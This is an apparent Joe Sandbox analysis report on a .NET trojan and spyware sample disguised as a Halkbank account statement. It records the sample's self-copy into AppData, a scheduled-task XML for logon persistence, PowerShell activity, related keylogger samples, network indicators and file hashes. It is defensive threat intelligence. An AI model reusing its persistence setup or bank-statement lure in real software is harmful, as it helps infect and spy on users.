Sample name:	Halkbank_Ekstre_20241022_081224_563756.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 69 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Halkbank_Ekstre_20241022_081224_563756.exe

Simulations

Behavior and APIs

Time	Type	Description
06:00:08	API Interceptor	9492159x Sleep call for process: Halkbank_Ekstre_20241022_081224_563756.exe modified
06:00:10	API Interceptor	29x Sleep call for process: powershell.exe modified
06:00:16	API Interceptor	2x Sleep call for process: bAZAANr.exe modified
12:00:10	Task Scheduler	Run new task: bAZAANr path: C:\Users\user\AppData\Roaming\bAZAANr.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/nwtkd
	Doc 784-01965670.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.timizoasisey.shop/3p0l/
	BL.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	w49A5FG3yg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	733812cm.n9shteam.in/DefaultWordpress.php
	9XHFe6y4Dj.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	733812cm.n9shteam.in/DefaultWordpress.php
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	t1zTzS9a3r.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
	aQdB62N7SB.elf	Get hash	malicious	Shikitega, Xmrig	Browse	main.dsn.ovh/dns/lovely
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/DyuQ5y15/download
132.226.247.73	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	080210232024.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	69-33-600 Kreiselkammer ER3.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	REVISED INVOICE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PAYMENT ADVISE MT107647545.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	seethemagicalpersoninmylifewithherlifegoodforme.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	SIPARIS-290124.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	Renommxterne.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	PAYMENT ADVISE MT107647545.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	080210232024.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	BT-036016002U_RFQ 014-010-02024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Adeleidae.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	SIPARIS-290124.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Renommxterne.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	PAYMENT ADVISE MT107647545.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	080210232024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	BT-036016002U_RFQ 014-010-02024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Adeleidae.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SIPARIS-290124.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	PO 635614 635613_CQDM.html	Get hash	malicious	HTMLPhisher	Browse	104.21.68.211
	https://railrent-railrent.powerappsportals.com/	Get hash	malicious	Unknown	Browse	172.67.140.116
	http://74.248.121.8/d/msdownload/update/software/defu/2024/10/updateplatform.amd64fre_d3f6f8300855e56b8ed00da6dac55a3c4cbf8c20.exe?cacheHostOrigin=au.download.windowsupdate.com	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://landsmith.ae/continue.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	mm.exe	Get hash	malicious	Unknown	Browse	172.67.177.220
	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.53.8
	https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/	Get hash	malicious	Unknown	Browse	172.67.4.35
	https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/	Get hash	malicious	Unknown	Browse	104.22.21.209
UTMEMUS	SIPARIS-290124.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	080210232024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Adeleidae.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	69-33-600 Kreiselkammer ER3.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	SIPARIS-290124.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	Renommxterne.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	PAYMENT ADVISE MT107647545.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	080210232024.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	BT-036016002U_RFQ 014-010-02024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Adeleidae.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3

Process:	C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bAZAANr.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\bAZAANr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
MD5:	4DC84D28CF28EAE82806A5390E5721C8
SHA1:	66B6385EB104A782AD3737F2C302DEC0231ADEA2
SHA-256:	1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
SHA-512:	E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_142fxk0j.umy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4spchqge.hrw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czultcis.eod.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gtciswzl.v5s.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1ju5ih4.n5h.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i43rkmla.x5m.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljruqizx.5re.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oilutxhm.dll.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp

Download File

Process:	C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.10148164992963
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtRzxvn:cgergYrFdOFzOzN33ODOiDdKrsuTRtv
MD5:	63C8E6999EBD936B5180012548CF38F0
SHA1:	35D71C835567DF69D147D14A5F1FCAABA5161092
SHA-256:	2B591537D56D8A219726F2A9873DC1370ED81C9ABEFD4FC03556B15A9E184508
SHA-512:	9804236BF4830BB74FDDE0D853130075B01C175F63EBA8DFC1D32E079FF2E86432789FEBF93A60E6C2717566F6DC9C4B94BEE71264ECEE4A7F6ABAF5662AA585
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpF6AC.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\bAZAANr.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.10148164992963
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtRzxvn:cgergYrFdOFzOzN33ODOiDdKrsuTRtv
MD5:	63C8E6999EBD936B5180012548CF38F0
SHA1:	35D71C835567DF69D147D14A5F1FCAABA5161092
SHA-256:	2B591537D56D8A219726F2A9873DC1370ED81C9ABEFD4FC03556B15A9E184508
SHA-512:	9804236BF4830BB74FDDE0D853130075B01C175F63EBA8DFC1D32E079FF2E86432789FEBF93A60E6C2717566F6DC9C4B94BEE71264ECEE4A7F6ABAF5662AA585
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\bAZAANr.exe

Download File

Process:	C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	625160
Entropy (8bit):	7.529917620831848
Encrypted:	false
SSDEEP:	12288:vHuE6rGxLuyNcssBraemJPY7Xv/JSKnFaMT9ynlT2sDxKwxRkR:CWsclY9S5MTd
MD5:	F52B285B21A1D390EC4E436E11957BD6
SHA1:	B9B593E257946C3216D0E0F5AAB12850E6695E4B
SHA-256:	4E007A23A0658F7417C1767BF2F2A0A3722853216E9A00489F79D57B555ACC9E
SHA-512:	E058BFE0361471D18DE1C97380CFB15C434F64F327A9A56EB8CC75247FAD3097B95125C0B13639FA050A4F57BAB5D3E2B246ACD1D1082599A7062D5DC13C6BE9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..J...........i... ........@.. ....................................@.................................:i..O....................T...6...........,..p............................................ ............... ..H............text....I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................ni......H......................hU...............................................0............{.....+..&...}.......0............{.....+..&...}.......0............{.....+..&...}.......0............{.....+..&...}....Z..}......}.....(.........0............{.....+..&...}.......0............{.....+..&...}....j.s....}......}.....(.........0............{.....+..&...}.......0............{.....+..&...}....".(.......0............{.....+..&...}.......0............{.....+..

C:\Users\user\AppData\Roaming\bAZAANr.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.529917620831848
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Halkbank_Ekstre_20241022_081224_563756.exe
File size:	625'160 bytes
MD5:	f52b285b21a1d390ec4e436e11957bd6
SHA1:	b9b593e257946c3216d0e0f5aab12850e6695e4b
SHA256:	4e007a23a0658f7417c1767bf2f2a0a3722853216e9a00489f79d57b555acc9e
SHA512:	e058bfe0361471d18de1c97380cfb15c434f64f327a9a56eb8cc75247fad3097b95125c0b13639fa050a4f57bab5d3e2b246acd1d1082599a7062d5dc13c6be9
SSDEEP:	12288:vHuE6rGxLuyNcssBraemJPY7Xv/JSKnFaMT9ynlT2sDxKwxRkR:CWsclY9S5MTd
TLSH:	1DD4E00013B8DA01E5F65BB44871D3F817B96E89B835C31A8EDABDEB7D72B905810793
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..J...........i... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

